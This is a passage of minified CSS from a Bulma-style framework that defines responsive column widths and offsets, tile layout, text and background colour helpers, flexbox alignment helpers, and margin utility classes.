-left:80%}.column.is-0,.column.is-0-tablet{flex:none;width:0%}.column.is-offset-0,.column.is-offset-0-tablet{margin-left:0%}.column.is-1,.column.is-1-tablet{flex:none;width:8.33333%}.column.is-offset-1,.column.is-offset-1-tablet{margin-left:8.33333%}.column.is-2,.column.is-2-tablet{flex:none;width:16.66667%}.column.is-offset-2,.column.is-offset-2-tablet{margin-left:16.66667%}.column.is-3,.column.is-3-tablet{flex:none;width:25%}.column.is-offset-3,.column.is-offset-3-tablet{margin-left:25%}.column.is-4,.column.is-4-tablet{flex:none;width:33.33333%}.column.is-offset-4,.column.is-offset-4-tablet{margin-left:33.33333%}.column.is-5,.column.is-5-tablet{flex:none;width:41.66667%}.column.is-offset-5,.column.is-offset-5-tablet{margin-left:41.66667%}.column.is-6,.column.is-6-tablet{flex:none;width:50%}.column.is-offset-6,.column.is-offset-6-tablet{margin-left:50%}.column.is-7,.column.is-7-tablet{flex:none;width:58.33333%}.column.is-offset-7,.column.is-offset-7-tablet{margin-left:58.33333%}.column.is-8,.column.is-8-tablet{flex:none;width:66.66667%}.column.is-offset-8,.column.is-offset-8-tablet{margin-left:66.66667%}.column.is-9,.column.is-9-tablet{flex:none;width:75%}.column.is-offset-9,.column.is-offset-9-tablet{margin-left:75%}.column.is-10,.column.is-10-tablet{flex:none;width:83.33333%}.column.is-offset-10,.column.is-offset-10-tablet{margin-left:83.33333%}.column.is-11,.column.is-11-tablet{flex:none;width:91.66667%}.column.is-offset-11,.column.is-offset-11-tablet{margin-left:91.66667%}.column.is-12,.column.is-12-tablet{flex:none;width:100%}.column.is-offset-12,.column.is-offset-12-tablet{margin-left:100%}}@media screen and (max-width: 1023px){.column.is-narrow-touch{flex:none;width:unset}.column.is-full-touch{flex:none;width:100%}.column.is-three-quarters-touch{flex:none;width:75%}.column.is-two-thirds-touch{flex:none;width:66.6666%}.column.is-half-touch{flex:none;width:50%}.column.is-one-third-touch{flex:none;width:33.3333%}.column.is-one-quarter-touch{flex:none;width:25%}.column.is-one-fifth-touch{flex:none;width:20%}.column.is-two-fifths-touch{flex:none;width:40%}.column.is-three-fifths-touch{flex:none;width:60%}.column.is-four-fifths-touch{flex:none;width:80%}.column.is-offset-three-quarters-touch{margin-left:75%}.column.is-offset-two-thirds-touch{margin-left:66.6666%}.column.is-offset-half-touch{margin-left:50%}.column.is-offset-one-third-touch{margin-left:33.3333%}.column.is-offset-one-quarter-touch{margin-left:25%}.column.is-offset-one-fifth-touch{margin-left:20%}.column.is-offset-two-fifths-touch{margin-left:40%}.column.is-offset-three-fifths-touch{margin-left:60%}.column.is-offset-four-fifths-touch{margin-left:80%}.column.is-0-touch{flex:none;width:0%}.column.is-offset-0-touch{margin-left:0%}.column.is-1-touch{flex:none;width:8.33333%}.column.is-offset-1-touch{margin-left:8.33333%}.column.is-2-touch{flex:none;width:16.66667%}.column.is-offset-2-touch{margin-left:16.66667%}.column.is-3-touch{flex:none;width:25%}.column.is-offset-3-touch{margin-left:25%}.column.is-4-touch{flex:none;width:33.33333%}.column.is-offset-4-touch{margin-left:33.33333%}.column.is-5-touch{flex:none;width:41.66667%}.column.is-offset-5-touch{margin-left:41.66667%}.column.is-6-touch{flex:none;width:50%}.column.is-offset-6-touch{margin-left:50%}.column.is-7-touch{flex:none;width:58.33333%}.column.is-offset-7-touch{margin-left:58.33333%}.column.is-8-touch{flex:none;width:66.66667%}.column.is-offset-8-touch{margin-left:66.66667%}.column.is-9-touch{flex:none;width:75%}.column.is-offset-9-touch{margin-left:75%}.column.is-10-touch{flex:none;width:83.33333%}.column.is-offset-10-touch{margin-left:83.33333%}.column.is-11-touch{flex:none;width:91.66667%}.column.is-offset-11-touch{margin-left:91.66667%}.column.is-12-touch{flex:none;width:100%}.column.is-offset-12-touch{margin-left:100%}}@media screen and (min-width: 1024px){.column.is-narrow-desktop{flex:none;width:unset}.column.is-full-desktop{flex:none;width:100%}.column.is-three-quarters-desktop{flex:none;width:75%}.column.is-two-thirds-desktop{flex:none;width:66.6666%}.column.is-half-desktop{flex:none;width:50%}.column.is-one-third-desktop{flex:none;width:33.3333%}.column.is-one-quarter-desktop{flex:none;width:25%}.column.is-one-fifth-desktop{flex:none;width:20%}.column.is-two-fifths-desktop{flex:none;width:40%}.column.is-three-fifths-desktop{flex:none;width:60%}.column.is-four-fifths-desktop{flex:none;width:80%}.column.is-offset-three-quarters-desktop{margin-left:75%}.column.is-offset-two-thirds-desktop{margin-left:66.6666%}.column.is-offset-half-desktop{margin-left:50%}.column.is-offset-one-third-desktop{margin-left:33.3333%}.column.is-offset-one-quarter-desktop{margin-left:25%}.column.is-offset-one-fifth-desktop{margin-left:20%}.column.is-offset-two-fifths-desktop{margin-left:40%}.column.is-offset-three-fifths-desktop{margin-left:60%}.column.is-offset-four-fifths-desktop{margin-left:80%}.column.is-0-desktop{flex:none;width:0%}.column.is-offset-0-desktop{margin-left:0%}.column.is-1-desktop{flex:none;width:8.33333%}.column.is-offset-1-desktop{margin-left:8.33333%}.column.is-2-desktop{flex:none;width:16.66667%}.column.is-offset-2-desktop{margin-left:16.66667%}.column.is-3-desktop{flex:none;width:25%}.column.is-offset-3-desktop{margin-left:25%}.column.is-4-desktop{flex:none;width:33.33333%}.column.is-offset-4-desktop{margin-left:33.33333%}.column.is-5-desktop{flex:none;width:41.66667%}.column.is-offset-5-desktop{margin-left:41.66667%}.column.is-6-desktop{flex:none;width:50%}.column.is-offset-6-desktop{margin-left:50%}.column.is-7-desktop{flex:none;width:58.33333%}.column.is-offset-7-desktop{margin-left:58.33333%}.column.is-8-desktop{flex:none;width:66.66667%}.column.is-offset-8-desktop{margin-left:66.66667%}.column.is-9-desktop{flex:none;width:75%}.column.is-offset-9-desktop{margin-left:75%}.column.is-10-desktop{flex:none;width:83.33333%}.column.is-offset-10-desktop{margin-left:83.33333%}.column.is-11-desktop{flex:none;width:91.66667%}.column.is-offset-11-desktop{margin-left:91.66667%}.column.is-12-desktop{flex:none;width:100%}.column.is-offset-12-desktop{margin-left:100%}}@media screen and (min-width: 1216px){.column.is-narrow-widescreen{flex:none;width:unset}.column.is-full-widescreen{flex:none;width:100%}.column.is-three-quarters-widescreen{flex:none;width:75%}.column.is-two-thirds-widescreen{flex:none;width:66.6666%}.column.is-half-widescreen{flex:none;width:50%}.column.is-one-third-widescreen{flex:none;width:33.3333%}.column.is-one-quarter-widescreen{flex:none;width:25%}.column.is-one-fifth-widescreen{flex:none;width:20%}.column.is-two-fifths-widescreen{flex:none;width:40%}.column.is-three-fifths-widescreen{flex:none;width:60%}.column.is-four-fifths-widescreen{flex:none;width:80%}.column.is-offset-three-quarters-widescreen{margin-left:75%}.column.is-offset-two-thirds-widescreen{margin-left:66.6666%}.column.is-offset-half-widescreen{margin-left:50%}.column.is-offset-one-third-widescreen{margin-left:33.3333%}.column.is-offset-one-quarter-widescreen{margin-left:25%}.column.is-offset-one-fifth-widescreen{margin-left:20%}.column.is-offset-two-fifths-widescreen{margin-left:40%}.column.is-offset-three-fifths-widescreen{margin-left:60%}.column.is-offset-four-fifths-widescreen{margin-left:80%}.column.is-0-widescreen{flex:none;width:0%}.column.is-offset-0-widescreen{margin-left:0%}.column.is-1-widescreen{flex:none;width:8.33333%}.column.is-offset-1-widescreen{margin-left:8.33333%}.column.is-2-widescreen{flex:none;width:16.66667%}.column.is-offset-2-widescreen{margin-left:16.66667%}.column.is-3-widescreen{flex:none;width:25%}.column.is-offset-3-widescreen{margin-left:25%}.column.is-4-widescreen{flex:none;width:33.33333%}.column.is-offset-4-widescreen{margin-left:33.33333%}.column.is-5-widescreen{flex:none;width:41.66667%}.column.is-offset-5-widescreen{margin-left:41.66667%}.column.is-6-widescreen{flex:none;width:50%}.column.is-offset-6-widescreen{margin-left:50%}.column.is-7-widescreen{flex:none;width:58.33333%}.column.is-offset-7-widescreen{margin-left:58.33333%}.column.is-8-widescreen{flex:none;width:66.66667%}.column.is-offset-8-widescreen{margin-left:66.66667%}.column.is-9-widescreen{flex:none;width:75%}.column.is-offset-9-widescreen{margin-left:75%}.column.is-10-widescreen{flex:none;width:83.33333%}.column.is-offset-10-widescreen{margin-left:83.33333%}.column.is-11-widescreen{flex:none;width:91.66667%}.column.is-offset-11-widescreen{margin-left:91.66667%}.column.is-12-widescreen{flex:none;width:100%}.column.is-offset-12-widescreen{margin-left:100%}}@media screen and (min-width: 1408px){.column.is-narrow-fullhd{flex:none;width:unset}.column.is-full-fullhd{flex:none;width:100%}.column.is-three-quarters-fullhd{flex:none;width:75%}.column.is-two-thirds-fullhd{flex:none;width:66.6666%}.column.is-half-fullhd{flex:none;width:50%}.column.is-one-third-fullhd{flex:none;width:33.3333%}.column.is-one-quarter-fullhd{flex:none;width:25%}.column.is-one-fifth-fullhd{flex:none;width:20%}.column.is-two-fifths-fullhd{flex:none;width:40%}.column.is-three-fifths-fullhd{flex:none;width:60%}.column.is-four-fifths-fullhd{flex:none;width:80%}.column.is-offset-three-quarters-fullhd{margin-left:75%}.column.is-offset-two-thirds-fullhd{margin-left:66.6666%}.column.is-offset-half-fullhd{margin-left:50%}.column.is-offset-one-third-fullhd{margin-left:33.3333%}.column.is-offset-one-quarter-fullhd{margin-left:25%}.column.is-offset-one-fifth-fullhd{margin-left:20%}.column.is-offset-two-fifths-fullhd{margin-left:40%}.column.is-offset-three-fifths-fullhd{margin-left:60%}.column.is-offset-four-fifths-fullhd{margin-left:80%}.column.is-0-fullhd{flex:none;width:0%}.column.is-offset-0-fullhd{margin-left:0%}.column.is-1-fullhd{flex:none;width:8.33333%}.column.is-offset-1-fullhd{margin-left:8.33333%}.column.is-2-fullhd{flex:none;width:16.66667%}.column.is-offset-2-fullhd{margin-left:16.66667%}.column.is-3-fullhd{flex:none;width:25%}.column.is-offset-3-fullhd{margin-left:25%}.column.is-4-fullhd{flex:none;width:33.33333%}.column.is-offset-4-fullhd{margin-left:33.33333%}.column.is-5-fullhd{flex:none;width:41.66667%}.column.is-offset-5-fullhd{margin-left:41.66667%}.column.is-6-fullhd{flex:none;width:50%}.column.is-offset-6-fullhd{margin-left:50%}.column.is-7-fullhd{flex:none;width:58.33333%}.column.is-offset-7-fullhd{margin-left:58.33333%}.column.is-8-fullhd{flex:none;width:66.66667%}.column.is-offset-8-fullhd{margin-left:66.66667%}.column.is-9-fullhd{flex:none;width:75%}.column.is-offset-9-fullhd{margin-left:75%}.column.is-10-fullhd{flex:none;width:83.33333%}.column.is-offset-10-fullhd{margin-left:83.33333%}.column.is-11-fullhd{flex:none;width:91.66667%}.column.is-offset-11-fullhd{margin-left:91.66667%}.column.is-12-fullhd{flex:none;width:100%}.column.is-offset-12-fullhd{margin-left:100%}}.columns{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.columns:last-child{margin-bottom:-.75rem}.columns:not(:last-child){margin-bottom:.75rem}.columns.is-centered{justify-content:center}.columns.is-gapless{margin-left:0;margin-right:0;margin-top:0}.columns.is-gapless>.column{margin:0;padding:0!important}.columns.is-gapless:not(:last-child){margin-bottom:1.5rem}.columns.is-gapless:last-child{margin-bottom:0}.columns.is-mobile{display:flex}.columns.is-multiline{flex-wrap:wrap}.columns.is-vcentered{align-items:center}@media screen and (min-width: 769px),print{.columns:not(.is-desktop){display:flex}}@media screen and (min-width: 1024px){.columns.is-desktop{display:flex}}.columns.is-variable{--columnGap: .75rem;margin-left:calc(-1 * var(--columnGap));margin-right:calc(-1 * var(--columnGap))}.columns.is-variable>.column{padding-left:var(--columnGap);padding-right:var(--columnGap)}.columns.is-variable.is-0{--columnGap: 0rem}@media screen and (max-width: 768px){.columns.is-variable.is-0-mobile{--columnGap: 0rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-0-tablet{--columnGap: 0rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-0-tablet-only{--columnGap: 0rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-0-touch{--columnGap: 0rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-0-desktop{--columnGap: 0rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-0-desktop-only{--columnGap: 0rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-0-widescreen{--columnGap: 0rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-0-widescreen-only{--columnGap: 0rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-0-fullhd{--columnGap: 0rem}}.columns.is-variable.is-1{--columnGap: .25rem}@media screen and (max-width: 768px){.columns.is-variable.is-1-mobile{--columnGap: .25rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-1-tablet{--columnGap: .25rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-1-tablet-only{--columnGap: .25rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-1-touch{--columnGap: .25rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-1-desktop{--columnGap: .25rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-1-desktop-only{--columnGap: .25rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-1-widescreen{--columnGap: .25rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-1-widescreen-only{--columnGap: .25rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-1-fullhd{--columnGap: .25rem}}.columns.is-variable.is-2{--columnGap: .5rem}@media screen and (max-width: 768px){.columns.is-variable.is-2-mobile{--columnGap: .5rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-2-tablet{--columnGap: .5rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-2-tablet-only{--columnGap: .5rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-2-touch{--columnGap: .5rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-2-desktop{--columnGap: .5rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-2-desktop-only{--columnGap: .5rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-2-widescreen{--columnGap: .5rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-2-widescreen-only{--columnGap: .5rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-2-fullhd{--columnGap: .5rem}}.columns.is-variable.is-3{--columnGap: .75rem}@media screen and (max-width: 768px){.columns.is-variable.is-3-mobile{--columnGap: .75rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-3-tablet{--columnGap: .75rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-3-tablet-only{--columnGap: .75rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-3-touch{--columnGap: .75rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-3-desktop{--columnGap: .75rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-3-desktop-only{--columnGap: .75rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-3-widescreen{--columnGap: .75rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-3-widescreen-only{--columnGap: .75rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-3-fullhd{--columnGap: .75rem}}.columns.is-variable.is-4{--columnGap: 1rem}@media screen and (max-width: 768px){.columns.is-variable.is-4-mobile{--columnGap: 1rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-4-tablet{--columnGap: 1rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-4-tablet-only{--columnGap: 1rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-4-touch{--columnGap: 1rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-4-desktop{--columnGap: 1rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-4-desktop-only{--columnGap: 1rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-4-widescreen{--columnGap: 1rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-4-widescreen-only{--columnGap: 1rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-4-fullhd{--columnGap: 1rem}}.columns.is-variable.is-5{--columnGap: 1.25rem}@media screen and (max-width: 768px){.columns.is-variable.is-5-mobile{--columnGap: 1.25rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-5-tablet{--columnGap: 1.25rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-5-tablet-only{--columnGap: 1.25rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-5-touch{--columnGap: 1.25rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-5-desktop{--columnGap: 1.25rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-5-desktop-only{--columnGap: 1.25rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-5-widescreen{--columnGap: 1.25rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-5-widescreen-only{--columnGap: 1.25rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-5-fullhd{--columnGap: 1.25rem}}.columns.is-variable.is-6{--columnGap: 1.5rem}@media screen and (max-width: 768px){.columns.is-variable.is-6-mobile{--columnGap: 1.5rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-6-tablet{--columnGap: 1.5rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-6-tablet-only{--columnGap: 1.5rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-6-touch{--columnGap: 1.5rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-6-desktop{--columnGap: 1.5rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-6-desktop-only{--columnGap: 1.5rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-6-widescreen{--columnGap: 1.5rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-6-widescreen-only{--columnGap: 1.5rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-6-fullhd{--columnGap: 1.5rem}}.columns.is-variable.is-7{--columnGap: 1.75rem}@media screen and (max-width: 768px){.columns.is-variable.is-7-mobile{--columnGap: 1.75rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-7-tablet{--columnGap: 1.75rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-7-tablet-only{--columnGap: 1.75rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-7-touch{--columnGap: 1.75rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-7-desktop{--columnGap: 1.75rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-7-desktop-only{--columnGap: 1.75rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-7-widescreen{--columnGap: 1.75rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-7-widescreen-only{--columnGap: 1.75rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-7-fullhd{--columnGap: 1.75rem}}.columns.is-variable.is-8{--columnGap: 2rem}@media screen and (max-width: 768px){.columns.is-variable.is-8-mobile{--columnGap: 2rem}}@media screen and (min-width: 769px),print{.columns.is-variable.is-8-tablet{--columnGap: 2rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.columns.is-variable.is-8-tablet-only{--columnGap: 2rem}}@media screen and (max-width: 1023px){.columns.is-variable.is-8-touch{--columnGap: 2rem}}@media screen and (min-width: 1024px){.columns.is-variable.is-8-desktop{--columnGap: 2rem}}@media screen and (min-width: 1024px) and (max-width: 1215px){.columns.is-variable.is-8-desktop-only{--columnGap: 2rem}}@media screen and (min-width: 1216px){.columns.is-variable.is-8-widescreen{--columnGap: 2rem}}@media screen and (min-width: 1216px) and (max-width: 1407px){.columns.is-variable.is-8-widescreen-only{--columnGap: 2rem}}@media screen and (min-width: 1408px){.columns.is-variable.is-8-fullhd{--columnGap: 2rem}}.tile{align-items:stretch;display:block;flex-basis:0;flex-grow:1;flex-shrink:1;min-height:-webkit-min-content;min-height:-moz-min-content;min-height:min-content}.tile.is-ancestor{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.tile.is-ancestor:last-child{margin-bottom:-.75rem}.tile.is-ancestor:not(:last-child){margin-bottom:.75rem}.tile.is-child{margin:0!important}.tile.is-parent{padding:.75rem}.tile.is-vertical{flex-direction:column}.tile.is-vertical>.tile.is-child:not(:last-child){margin-bottom:1.5rem!important}@media screen and (min-width: 769px),print{.tile:not(.is-child){display:flex}.tile.is-1{flex:none;width:8.33333%}.tile.is-2{flex:none;width:16.66667%}.tile.is-3{flex:none;width:25%}.tile.is-4{flex:none;width:33.33333%}.tile.is-5{flex:none;width:41.66667%}.tile.is-6{flex:none;width:50%}.tile.is-7{flex:none;width:58.33333%}.tile.is-8{flex:none;width:66.66667%}.tile.is-9{flex:none;width:75%}.tile.is-10{flex:none;width:83.33333%}.tile.is-11{flex:none;width:91.66667%}.tile.is-12{flex:none;width:100%}}.has-text-white{color:#fff!important}a.has-text-white:hover,a.has-text-white:focus{color:#e6e6e6!important}.has-background-white{background-color:#fff!important}.has-text-black{color:#0a0a0a!important}a.has-text-black:hover,a.has-text-black:focus{color:#000!important}.has-background-black{background-color:#0a0a0a!important}.has-text-light{color:#f5f5f5!important}a.has-text-light:hover,a.has-text-light:focus{color:#dbdbdb!important}.has-background-light{background-color:#f5f5f5!important}.has-text-dark{color:#363636!important}a.has-text-dark:hover,a.has-text-dark:focus{color:#1c1c1c!important}.has-background-dark{background-color:#363636!important}.has-text-primary{color:#00d1b2!important}a.has-text-primary:hover,a.has-text-primary:focus{color:#009e86!important}.has-background-primary{background-color:#00d1b2!important}.has-text-primary-light{color:#ebfffc!important}a.has-text-primary-light:hover,a.has-text-primary-light:focus{color:#b8fff4!important}.has-background-primary-light{background-color:#ebfffc!important}.has-text-primary-dark{color:#00947e!important}a.has-text-primary-dark:hover,a.has-text-primary-dark:focus{color:#00c7a9!important}.has-background-primary-dark{background-color:#00947e!important}.has-text-link{color:#485fc7!important}a.has-text-link:hover,a.has-text-link:focus{color:#3449a8!important}.has-background-link{background-color:#485fc7!important}.has-text-link-light{color:#eff1fa!important}a.has-text-link-light:hover,a.has-text-link-light:focus{color:#c8cfee!important}.has-background-link-light{background-color:#eff1fa!important}.has-text-link-dark{color:#3850b7!important}a.has-text-link-dark:hover,a.has-text-link-dark:focus{color:#576dcb!important}.has-background-link-dark{background-color:#3850b7!important}.has-text-info{color:#3e8ed0!important}a.has-text-info:hover,a.has-text-info:focus{color:#2b74b1!important}.has-background-info{background-color:#3e8ed0!important}.has-text-info-light{color:#eff5fb!important}a.has-text-info-light:hover,a.has-text-info-light:focus{color:#c6ddf1!important}.has-background-info-light{background-color:#eff5fb!important}.has-text-info-dark{color:#296fa8!important}a.has-text-info-dark:hover,a.has-text-info-dark:focus{color:#368ace!important}.has-background-info-dark{background-color:#296fa8!important}.has-text-success{color:#48c78e!important}a.has-text-success:hover,a.has-text-success:focus{color:#34a873!important}.has-background-success{background-color:#48c78e!important}.has-text-success-light{color:#effaf5!important}a.has-text-success-light:hover,a.has-text-success-light:focus{color:#c8eedd!important}.has-background-success-light{background-color:#effaf5!important}.has-text-success-dark{color:#257953!important}a.has-text-success-dark:hover,a.has-text-success-dark:focus{color:#31a06e!important}.has-background-success-dark{background-color:#257953!important}.has-text-warning{color:#ffe08a!important}a.has-text-warning:hover,a.has-text-warning:focus{color:#ffd257!important}.has-background-warning{background-color:#ffe08a!important}.has-text-warning-light{color:#fffaeb!important}a.has-text-warning-light:hover,a.has-text-warning-light:focus{color:#ffecb8!important}.has-background-warning-light{background-color:#fffaeb!important}.has-text-warning-dark{color:#946c00!important}a.has-text-warning-dark:hover,a.has-text-warning-dark:focus{color:#c79200!important}.has-background-warning-dark{background-color:#946c00!important}.has-text-danger{color:#f14668!important}a.has-text-danger:hover,a.has-text-danger:focus{color:#ee1742!important}.has-background-danger{background-color:#f14668!important}.has-text-danger-light{color:#feecf0!important}a.has-text-danger-light:hover,a.has-text-danger-light:focus{color:#fabdc9!important}.has-background-danger-light{background-color:#feecf0!important}.has-text-danger-dark{color:#cc0f35!important}a.has-text-danger-dark:hover,a.has-text-danger-dark:focus{color:#ee2049!important}.has-background-danger-dark{background-color:#cc0f35!important}.has-text-black-bis{color:#121212!important}.has-background-black-bis{background-color:#121212!important}.has-text-black-ter{color:#242424!important}.has-background-black-ter{background-color:#242424!important}.has-text-grey-darker{color:#363636!important}.has-background-grey-darker{background-color:#363636!important}.has-text-grey-dark{color:#4a4a4a!important}.has-background-grey-dark{background-color:#4a4a4a!important}.has-text-grey{color:#7a7a7a!important}.has-background-grey{background-color:#7a7a7a!important}.has-text-grey-light{color:#b5b5b5!important}.has-background-grey-light{background-color:#b5b5b5!important}.has-text-grey-lighter{color:#dbdbdb!important}.has-background-grey-lighter{background-color:#dbdbdb!important}.has-text-white-ter{color:#f5f5f5!important}.has-background-white-ter{background-color:#f5f5f5!important}.has-text-white-bis{color:#fafafa!important}.has-background-white-bis{background-color:#fafafa!important}.is-flex-direction-row{flex-direction:row!important}.is-flex-direction-row-reverse{flex-direction:row-reverse!important}.is-flex-direction-column{flex-direction:column!important}.is-flex-direction-column-reverse{flex-direction:column-reverse!important}.is-flex-wrap-nowrap{flex-wrap:nowrap!important}.is-flex-wrap-wrap{flex-wrap:wrap!important}.is-flex-wrap-wrap-reverse{flex-wrap:wrap-reverse!important}.is-justify-content-flex-start{justify-content:flex-start!important}.is-justify-content-flex-end{justify-content:flex-end!important}.is-justify-content-center{justify-content:center!important}.is-justify-content-space-between{justify-content:space-between!important}.is-justify-content-space-around{justify-content:space-around!important}.is-justify-content-space-evenly{justify-content:space-evenly!important}.is-justify-content-start{justify-content:start!important}.is-justify-content-end{justify-content:end!important}.is-justify-content-left{justify-content:left!important}.is-justify-content-right{justify-content:right!important}.is-align-content-flex-start{align-content:flex-start!important}.is-align-content-flex-end{align-content:flex-end!important}.is-align-content-center{align-content:center!important}.is-align-content-space-between{align-content:space-between!important}.is-align-content-space-around{align-content:space-around!important}.is-align-content-space-evenly{align-content:space-evenly!important}.is-align-content-stretch{align-content:stretch!important}.is-align-content-start{align-content:start!important}.is-align-content-end{align-content:end!important}.is-align-content-baseline{align-content:baseline!important}.is-align-items-stretch{align-items:stretch!important}.is-align-items-flex-start{align-items:flex-start!important}.is-align-items-flex-end{align-items:flex-end!important}.is-align-items-center{align-items:center!important}.is-align-items-baseline{align-items:baseline!important}.is-align-items-start{align-items:start!important}.is-align-items-end{align-items:end!important}.is-align-items-self-start{align-items:self-start!important}.is-align-items-self-end{align-items:self-end!important}.is-align-self-auto{align-self:auto!important}.is-align-self-flex-start{align-self:flex-start!important}.is-align-self-flex-end{align-self:flex-end!important}.is-align-self-center{align-self:center!important}.is-align-self-baseline{align-self:baseline!important}.is-align-self-stretch{align-self:stretch!important}.is-flex-grow-0{flex-grow:0!important}.is-flex-grow-1{flex-grow:1!important}.is-flex-grow-2{flex-grow:2!important}.is-flex-grow-3{flex-grow:3!important}.is-flex-grow-4{flex-grow:4!important}.is-flex-grow-5{flex-grow:5!important}.is-flex-shrink-0{flex-shrink:0!important}.is-flex-shrink-1{flex-shrink:1!important}.is-flex-shrink-2{flex-shrink:2!important}.is-flex-shrink-3{flex-shrink:3!important}.is-flex-shrink-4{flex-shrink:4!important}.is-flex-shrink-5{flex-shrink:5!important}.is-clearfix:after{clear:both;content:" ";display:table}.is-pulled-left{float:left!important}.is-pulled-right{float:right!important}.is-radiusless{border-radius:0!important}.is-shadowless{box-shadow:none!important}.is-clickable{cursor:pointer!important;pointer-events:all!important}.is-clipped{overflow:hidden!important}.is-relative{position:relative!important}.is-marginless{margin:0!important}.is-paddingless{padding:0!important}.m-0{margin:0!important}.mt-0{margin-top:0!important}.mr-0{margin-right:0!important}.mb-0{margin-bottom:0!important}.ml-0{margin-left:0!important}.mx-0{margin-left:0!important;margin-right:0!important}.my-0{margin-top:0!important;margin-bottom:0!important}.m-1{margin:.25rem!important}.mt-1{margin-top:.25rem!important}.mr-1{margin-right:.25rem!important}.mb-1{margin-bottom:.25rem!important}.ml-1{margin-left:.25rem!important}.mx-1{margin-left:.25rem!important;margin-right:.25rem!important}.my-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.m-2{margin:.5rem!important}.mt-2{margin-top:.5rem!important}.mr-2{margin-right:.5rem!important}.mb-2{margin-bottom:.5rem!important}.ml-2{margin-left:.5rem!important}.mx-2{margin-left:.5rem!important;margin-right:.5rem!important}.my-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.m-3{margin:.75rem!important}.mt-3{margin-top:.75rem!important}.mr-3{margin-right:.75rem!important}.mb-3{margin-bottom:.75rem!important}.ml-3{margin-left:.75rem!important}.mx-3{margin-left:.75rem!important;margin-right:.75rem!important}.my-3{margin-top:.75rem!important;margin-bottom:.75rem!important}.m-4{margin:1rem!important}.mt-4{margin-top:1rem!important}.mr-4{margin-right:1rem!important}.mb-4{margin-bottom:1rem!important}.ml-4{margin-left:1rem!important}.mx-4{margin-left:1rem!important;margin-right:1rem!important}.my-4{margin-top:1rem!important;margin-bottom:1rem!important}.m-5{margin:1.5rem!important}.mt-5{margin-top:1.5rem!important}.mr-5{margin-right:1.5rem!important}.mb-5{margin-bottom:1.5rem!important}.ml-5{margin-left:1.5rem!important}.mx-5{margin-left:1.5rem!important;margin-right:1.5rem!important}.my-5{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.m-6{margin:3rem!important}.mt-6{margin-top:3rem!important}.mr-6{margin-right:3rem!important}.mb-6{margin-bottom:3rem!important}.ml-6{margin-left:3rem!important}.mx-6{margin-left:3rem!important;margin-right:3rem!important}.my-6{margin-top:3rem!important;margin-bottom:3rem!important}.m-auto{margin:auto!important}.m